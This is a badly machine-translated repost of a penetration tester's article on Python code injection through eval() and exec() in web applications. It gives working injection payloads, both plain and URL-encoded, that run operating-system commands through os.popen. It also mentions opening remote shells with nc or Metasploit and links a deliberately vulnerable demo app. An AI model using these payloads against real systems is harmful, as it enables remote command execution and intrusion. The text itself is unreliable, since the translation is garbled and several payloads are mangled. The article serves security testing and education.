佚名MYHACK58:62201681089The use of Python code implementing the Web application of the injection-vulnerability warning-the black bar safety net
Vulnerability overview
If your Web application exists in the Python code injection vulnerability, the attacker can use your Web applications to your back-end server of the Python parser to send malicious Python code. This also means that if you can on the target server execute Python code, you can call the serveroperating systemthe instruction to implement the attack. By running theoperating systemcommand, you can not only to those who can access the file for read and write operations, and can even start a remote interactive Shell, such as nc, Metasploit, and Empire in.
In order to reproduce this vulnerability, I in a recent external penetration test process was to try to take advantage of this vulnerability. At the time I want online to find some information about this vulnerability is a specific application of the method of information, but did not find too much valuable content. In colleague Charlie Worrell(@decidedlygray help, we successfully passed the Burp POC implements a non-interactive shell, which is also Our of this article is to describe the content.
Because in addition to Python, there are a lot of other languages, such as Perl and Ruby also likely to be a code injection issue, so the Python code injection belongs to the server-side code injection. In fact, if you would like to know and I did a CWE of followers, then following both the CWE and maybe can give you some valuable reference content:
1. CWE-9 4: code generation control inappropriate‘code injection’)
2. CWE-9 5: dynamic code evaluation instructions improper handling of the‘Eval injection’)
Exploit
Assuming you are now using Burp or other tools found a Python injection vulnerabilities, and then exploit Payload and is shown below:
eval(compile(‘for x in range(1):\n import time\n time. sleep(2 0)’,‘a’,‘single’))
Then you can use the following Payload to the target host to achieve theoperating systemcommand injection:
eval(compile(“”“for x in range(1):\\n import os\\n os. popen(r’COMMAND’). read()”“”,",‘single’))
In fact, you don’t even need to use a for Loop, directly use the global function“import”on it. Specific code as follows:
eval(compile(“”“import(‘os’). popen(r’COMMAND’). read()”“”,",‘single’))
In fact, our Payload code can also be more concise, since we have the import and popen to write in an expression inside, then in most cases you don’t even need to use compile. Specific code as follows:
import(‘os’). popen(‘COMMAND’). read()
In order to be the Payload sent to the target Web application, you need to where certain characters are URL encoded. In order to save everyone time, we have been here the above-listed Payload code coding complete, specific as follows:
param=eval%28compile%2 8%27for%20x%20in%20range%2 8 1% 2 9%3A%0A%20import%20time%0A%20time. sleep%2 8 2 0% 2 9% 2 7%2C%27a%2 7%2C%27single%2 7% 2 9% 2 9
param=eval%28compile%2 8% 2 2% 2 2%22for%20x%20in%20range%2 8 1% 2 9%3A%5Cn%20import%20os%5Cn%20os. popen%28r%27COMMAND%2 7% 2 9. read%2 8%2 9%2 2%2 2%2 2%2C%2 7% 2 7%2C%27single%2 7% 2 9% 2 9
param=eval%28compile%2 8%2 2%2 2%2 2__import__%2 8%27os%2 7% 2 9. popen%28r%27COMMAND%2 7% 2 9. read%2 8%2 9%2 2%2 2%2 2%2C%2 7% 2 7%2C%27single%2 7% 2 9% 2 9
param=import%2 8%27os%2 7% 2 9. popen%2 8%27COMMAND%2 7% 2 9. read%2 8% 2 9
Next, we will introduce to you about this vulnerability the details of the content, and share with you a contain this vulnerability of Web applications. At the end of the article, I will show you a tool, this tool is I and my colleague Charlie Co-write, it can significantly reduce your In take advantage of this vulnerability when the time spent. In short, this tool like sqlmap, like, allows you to quickly find theSQL injectionvulnerabilities, but this tool is still in its infancy, the interest of the students in the project’s GitHub homepage[portal]communicate with me about it.
Build a contains vulnerability Server
In order to better give students a presentation, I specifically create a vulnerability of the Web application. If you want to do-it-yourself attempts to exploit this vulnerability, you can click here to access this Web application. Next, we want to configure is the Web application running environment, 即通过pip或者easy_install来安装web.py the. It can be used as a stand-alone server running, or you can also load it to contain the mod_wsgi module in the Apache server. Related to the operation instruction as shown below:
git clone https://github.com/sethsec/PyCodeInjection.git
cd VulnApp
./ install_requirements.sh
python PyCodeInjectionApp.py
Vulnerability analysis
When you search the Internet about python’s eval()function, almost no articles will remind you this function is very unsafe, and the eval()function is causing this Python code injection vulnerability is the culprit. If you encounter the following two cases, a description of your Web application in the presence of this vulnerability:
1. The Web application accepts user input, such as GET/POST parameters, cookie values; and
2. The Web application uses an unsafe method to the user’s input data is passed to the eval()function did not go through security review, or the lack of security protection mechanisms; and
Shown below is a vulnerability of the sample code:
! [](/Article/UploadPic/2016-11/2 0 1 6 1 1 1 2 1 3 0 1 8 8 1 8. png? www. myhack58. com)
As you can see, the eval()function is the code above the only one there is a problem somewhere. In addition, if the developer direct the user’s input data sequence of data to break the seal, then the Web application will also be the emergence of this vulnerability.
But it needs to be noted that, in addition to the eval()function with Python’s exec()function is also likely to make your Web applications the emergence of this vulnerability. And as I shown, now many developers are in the Web application in the non-standard use of the exec()function, so this problem will certainly exist.
Automatically scan for vulnerabilities
In order to tell everyone how to exploit the vulnerability to attack, I usually will use a scanner to find some I had not seen something. Find the after, I then think of a way will be nothing new PoC developed into a meaningful exploit it. But I want to remind you is, don’t over-rely on the scan tool, because there is a lot of things is the scan tool also can’t find.